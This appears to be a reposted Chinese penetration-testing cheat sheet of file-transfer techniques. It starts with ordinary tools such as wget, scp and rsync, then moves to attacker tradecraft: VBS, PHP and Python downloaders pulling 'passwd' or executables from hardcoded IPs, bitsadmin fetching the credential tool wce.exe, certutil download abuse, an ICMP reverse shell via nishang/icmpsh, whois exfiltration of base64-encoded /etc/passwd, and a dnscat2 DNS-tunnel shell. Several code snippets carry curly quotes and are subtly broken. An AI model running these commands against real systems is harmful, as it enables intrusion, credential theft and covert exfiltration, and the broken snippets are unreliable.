文件传输

常见文件传输方法

搬运自:0d4y

wput

1
wput dir_name ftp://linuxpig:123456@host.com/

wget

1
wget http://site.com/1.rar -O 1.rar

ariac2

需安装

1
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

powershell

1
$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file","C:%homepath%file")

vbs脚本

1
2
3
4
5
6
7
8
9
10
11
12
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://111.230.170.95/passwd"
'发送请求
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
'等待3秒,等文件下载
'wscript.sleep 3000 
aGet.Write(post.responseBody)'写数据
aGet.SaveToFile "passwd",2

cscript test.vbs

perl

1
2
3
#!/usr/bin/perl
use LWP::Simple;
getstore(“http://domain/file", “file”);

执行:perl test.pl

python

1
2
3
4
5
6
7
#!/usr/bin/python
import urllib2
u = urllib2.urlopen(‘http://192.168.20.149/ds.exe')
localFile = open(‘local_file’, ‘w’)
localFile.write(u.read())
localFile.close()
执行:python test.py

ruby

1
2
3
4
5
6
7
8
#!/usr/bin/ruby
require ‘net/http’
Net::HTTP.start(“www.domain.com") { |http|
r = http.get(“/file”)
open(“save_location”, “wb”) { |file|
file.write(r.body)
}
}

执行:ruby test.rb

php

1
2
3
4
5
6
7
8
#!/usr/bin/php
<?php
$data = @file("http://111.230.170.95/passwd");
$lf = “passwd”;
$fh = fopen($lf, ‘w’);
fwrite($fh, $data[0]);
fclose($fh);
?>

执行:php test.php

NC

  • attacker

    1
    cat file | nc -l 1234

  • target

    1
    nc host_ip 1234 > file

FTP

1
ftp 127.0.0.1 username password get file exit

TFTP

1
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server

Bitsadmin

1
2
bitsadmin /transfer n http://domain/file c:%homepath%file
bitsadmin /transfer down /download /priority normal "http://111.230.170.95/wce.exe" D:\wce.exe

Window 文件共享

1
2
3
4
net use x: \127.0.0.1\share /user:example.comuserID myPassword
net use u: \\192.168.20.201\gong
administrator
Hello123

SCP

  • 本地到远程

    1
    scp file user@host.com:/tmp

  • 远程到本地

    1
    scp user@host.com:/tmp file

rsync

  • 远程rsync服务器中拷贝文件到本地机

    1
    rsync -av root@192.168.78.192::www /databack

  • 本地机器拷贝文件到远程rsync服务器

    1
    rsync -av /databack root@192.168.78.192::www

certuuil.exe

1
certutil.exe -urlcache -split -f http://site.com/file

icmp传输反弹shell

工具nishangicmpsh

  1. 忽略icmp回显

    1
    sysctl -w net.ipv4.icmp_echo_ignore_all=1

  2. 开启icmp监听

    1
    python icmpsh_m.py 192.168.158.133 192.168.158.128

  3. 进入nishang\Shells路径

  • Powershell加载并运行

    1
    2
    3
    Import-module .\Invoke-PowerShellIcmp.ps1
    Invoke-PowerShellIcmp
    192.168.158.133

  • cmd中运行Powershell加载并运行

    1
    powershell.exe -exec bypass "import-module .\Invoke-PowerShellIcmp.ps1;Invoke-PowerShellIcmp 192.168.158.133"

whois传输

1
2
3
4
5
6
# 传输机base64加密(无空格,不易产生歧义)
whois -h 192.168.x.x -p 4444 `cat /etc/passwd | base64`


# 接收机base64解密
nc -lvvp 4444 | sed "s/ //g" | base64 -d

DNS传输

  1. 外网server端

    1
    2
    3
    4
    5
    6
    7
    8
    9
    git clone https://github.com/iagox86/dnscat2.git
    cd server
    gem install bundler
    bundle install
    ruby .dnscat2.rb
    ./dnscat --dns server=x.x.x.x,port=53 --secret=32fjafja[fjoas

    # 需要ruby环境,若无法安装ruby,尝试命令:
    apt install ruby-dev

  2. Kali client端

    1
    2
    3
    4
    git clone https://github.com/iagox86/dnscat2.git
    cd client
    make
    ./dnscat --dns server=x.x.x.x,port=53 --secret=32fjafja[fjoas

  3. Windows client端
    下载工具Dnscat2.exe

    1
    2
    https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip
    dnscat2-v0.07-client-win32.exe --dns server=x.x.x.x --secret=32fjafja[fjoas

  4. 外网server端控制shell

    1
    2
    3
    4
    5
    6
    7
    dnscat2>
    help
    windows
    window -i 1
    shell
    session -i 2
    whoami

您的支持是我前进的动力!